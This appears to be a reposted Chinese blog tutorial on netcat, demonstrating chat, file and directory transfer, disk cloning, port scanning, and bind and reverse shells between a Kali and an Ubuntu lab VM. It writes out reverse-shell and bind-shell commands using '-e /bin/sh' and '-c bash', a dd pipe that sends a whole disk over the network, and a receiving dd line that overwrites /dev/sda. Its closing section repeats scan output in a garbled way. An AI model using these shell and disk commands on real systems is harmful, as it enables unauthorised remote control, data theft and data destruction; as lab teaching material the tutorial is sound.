当前位置:   article > 正文

Netcat使用学习

netcat

一、Netcat简介

**netcat **是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。

netcat 所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。

二、Netcat常用参数:

OpenBSD netcat (Debian patchlevel 1.218-4ubuntu1)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
	  [-m minttl] [-O length] [-P proxy_username] [-p source_port]
	  [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
	  [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
	  [destination] [port]
	Command Summary:
		-4		Use IPv4
		-6		Use IPv6
		-b		Allow broadcast
		-C		Send CRLF as line-ending
		-D		Enable the debug socket option
		-d		Detach from stdin
		-F		Pass socket fd
		-h		This help text
		-I length	TCP receive buffer length
		-i interval	Delay interval for lines sent, ports scanned
		-k		Keep inbound sockets open for multiple connects
		-l		Listen mode, for inbound connects
		-M ttl		Outgoing TTL / Hop Limit
		-m minttl	Minimum incoming TTL / Hop Limit
		-N		Shutdown the network socket after EOF on stdin
		-n		Suppress name/port resolutions
		-O length	TCP send buffer length
		-P proxyuser	Username for proxy authentication
		-p port		Specify local port for remote connects
		-q secs		quit after EOF on stdin and delay of secs
		-r		Randomize remote ports
		-S		Enable the TCP MD5 signature option
		-s sourceaddr	Local source address
		-T keyword	TOS value
		-t		Answer TELNET negotiation
		-U		Use UNIX domain socket
		-u		UDP mode
		-V rtable	Specify alternate routing table
		-v		Verbose
		-W recvlimit	Terminate after receiving a number of packets
		-w timeout	Timeout for connects and final net reads
		-X proto	Proxy protocol: "4", "5" (SOCKS) or "connect"
		-x addr[:port]	Specify proxy address and port
		-Z		DCCP mode
		-z		Zero-I/O mode [used for scanning]
	Port numbers can be individual or ranges: lo-hi [inclusive]
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43

三、实验内容

实验设备:
服务端:Kali-linux-2022 
192.168.3.21
客户端:Ubuntu 22.04.1 LTS 
192.168.3.22
  • 1
  • 2
  • 3
  • 4
  • 5
1.传输文本信息

nc 可以在两台机器之间相互传递信息,首先需要有一台机器进行监听一个端口,另一台以连接的方式去连接其指定的端口,这样两台机器之间建立了通信后,相互之间可以传输信息。l 参数是监听模式的意思,p 是指定一个端口

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234
hello?
hi? 
  • 1
  • 2
  • 3
  • 4

客户端

root@ubuntu-virtual-machine:/# nc -nv 192.168.3.21 1234
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
hello?
hi?
  • 1
  • 2
  • 3
  • 4

这种相互传输信息和渗透之间的关系是,电子取证的时候可以用。当机器被攻击后,为了不破坏现场,需要提出大量的信息和文件出来做分析,这时候可以用 nc 的这个机制,例如,需要一个命令的输出信息,首先在一台机器上监听一个端口,随后在被攻击的机器上执行相关的命令,然后以管道给 nc,指定另一台的地址和端口,这样输出结果就会到另一端

2.进行文件传输
文件传输->下载

服务端在/home/kali/下创建log.txt用于记录文件

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 > /home/kali/log.txt 
  • 1
  • 2

客户端进行nc

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 < openme.txt
  • 1

回到/home/kali/目录下,查看log.txt

┌──(kali㉿kali)-[~]
└─$ cat log.txt   
If you see me, the file has been successfully downloaded!
  • 1
  • 2
  • 3

image-20221124210632880

文件传输->上传

服务端传输log.txt

┌──(kali㉿kali)-[~]
└─$ nc -lp 1234 < /home/kali/log.txt
  • 1
  • 2

客户端接收

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 > get.txt
  • 1
root@ubuntu-virtual-machine:/home/ubuntu/桌面# cat get.txt
If you see me, the file has been successfully downloaded!
  • 1
  • 2

image-20221124210943981

可以看到已经成功写入了客户端的get.txt文件中

以windows为服务器端,kali为客户端,上述操作相反即可,这里不给出实际应用 如果此时服务端并没有准备好连接,而客户端已经使用NC进行连接, 那么客户端就会一直等待下去,知道连接上服务端,造成一种“假死"状态。 解决方法:设置等待时间

3.传输文件目录

对于传输目录其实和传输文本信息传输文件一样,当作文件处理即可,传输时将目录进行压缩进行传输,随后另一台机器接收后进行解压,这样就完成了目录的传输。例如使用 tar 命令,cvf 进行压缩,xvf 进行解压,c 是压缩的意思,v 是显示详细过程,f 是文件名,x 是解压。

服务端

┌──(kali㉿kali)-[~/Desktop]
└─$ tar cvf - ~/Desktop/ | nc -lp 1234 -q l
tar: Removing leading `/' from member names
/home/kali/Desktop/
/home/kali/Desktop/class two/
/home/kali/Desktop/heard.txt
/home/kali/Desktop/class one/
/home/kali/Desktop/class one/first.pcapng
/home/kali/Desktop/class one/class_two.pcapng
/home/kali/Desktop/class one/class_one.pcapng
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -nv 192.168.3.21 1234 | tar xvf -
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
home/kali/Desktop/
home/kali/Desktop/class two/
home/kali/Desktop/heard.txt
home/kali/Desktop/class one/
home/kali/Desktop/class one/first.pcapng
home/kali/Desktop/class one/class_two.pcapng
home/kali/Desktop/class one/class_one.pcapng
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
4.加密传输文件

加密传输文件需要使用 mcrypt 库,linux 系统默认是没有安装的,需要手动安装。随后和传输文件类似,只需要在传输文件时使用 mcrypt 加密即可。

命令用到的参数有,–flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密,首先在接收端监听一个端口,等待另一台进行连接传送文件,随后在要传送的机器上把要传送的文件进行加密使用 nc 连接指定的地址和 ip

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > heard.txt
Enter passphrase: 
  • 1
  • 2
  • 3

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# mcrypt --flush -Fbq -a rijndael-256 -m ecb < get.txt | nc -nv 192.168.3.21 1234 -q 1
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: Connection to 192.168.3.21 1234 port [tcp/*] succeeded!

Enter passphrase:
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
5.远程克隆硬盘

对于远程克隆硬盘,在远程电子取证时可以用,使用方法需要借助 dd 命令,首先通过 nc 监听一个端口,然后通过 dd 指定要克隆的分区,dd 的 of 参数相当于一个复制功能,然后再另一台机器通过 nc 连接此端口,dd 的 if 参数相当于粘贴的命令。格式如下:

nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1
  • 1
  • 2
6.创建监听型/连接型后门
监听型后门

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ncat -l -e /bin/sh -p 4444
  • 1
  • 2

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -w 10 192.168.3.21 4444
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)
        RX packets 172820  bytes 37543859 (35.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189400  bytes 52498244 (50.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 144  bytes 7472 (7.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 144  bytes 7472 (7.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
连接型后门

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -ltvp 4444                                             
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:46990.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
ifconfig
root@ubuntu-virtual-machine:/home/ubuntu/桌面# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)
        RX packets 272375  bytes 159129764 (159.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 206658  bytes 16759835 (16.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (本地环回)
        RX packets 3390  bytes 440132 (440.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3390  bytes 440132 (440.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
7.远程控制/正反shell
正向shell

正向Shell,服务器模式下的 netcat 侦听连接并将外壳进程提供给任何连接的客户端。然后以客户端模式运行的 Netcat 可以连接到服务器并获得对服务器的 shell 访问并运行命令。从渗透测试的角度来看,服务器是受害者机器,客户端是攻击者机器。

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 -c bash                                                  
  • 1
  • 2

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)
        RX packets 172760  bytes 37538472 (35.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189345  bytes 52492855 (50.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 74  bytes 3740 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 74  bytes 3740 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
反向shell

对于反向 shell,我们在服务器模式下使用 netcat 来侦听连接,然后从客户端提供 shell。这将允许服务器上的会话在收到 shell 后在客户端上运行命令。从渗透测试的角度来看,服务器是攻击者机器,客户端是受害者机器

服务端(攻击方)

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444                                                           
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:59992.
ls
get.txt
hey.txt
home
openme.txt
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)
        RX packets 272035  bytes 159047796 (159.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 206567  bytes 16752141 (16.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (本地环回)
        RX packets 3388  bytes 439992 (439.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3388  bytes 439992 (439.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31

客户端(受害方)

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
  • 1
8.端口扫描

nc 用来进行端口扫描的命令是 nc -nvz ip 地址 端口号,z 参数翻译过来就是不进行 i/o,用来扫描。意思就是仅仅是去 ping 去探测目标是否开启指定端口,不进行任何的交互。

-n 参数翻译过来就是只接收 ip 地址,没有 dns
-v 参数就是列出执行过程的详细信息
-z 参数默认扫描的是 tcp 类型,如果需要扫描 udp,则需要使用一个新参数 -u
  • 1
  • 2
  • 3

我先在客户机开启了apache2服务

image-20221124204049608

客户机查看端口状态命令netstat -ano

┌──(root㉿kali)-[/home/kali/Desktop]
└─# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 192.168.3.21:68         192.168.3.1:67          ESTABLISHED off (0.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

apache2服务默认使用的是80端口

nc -nvz 192.168.3.21 70-90
  • 1
root@ubuntu-virtual-machine:/# nc -nvz 192.168.3.21 70-90
nc: connect to 192.168.3.21 port 70 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 71 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 72 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 73 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 74 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22

四、总结

to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused


### 四、总结

Netcat 是用于网络相关活动的非常棒的工具,我发现它在渗透测试中非常有用,实在是一款不可多得的网络测试工具。
  • 1
  • 2
  • 3
  • 4
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/194722
推荐阅读
相关标签
  

闽ICP备14008679号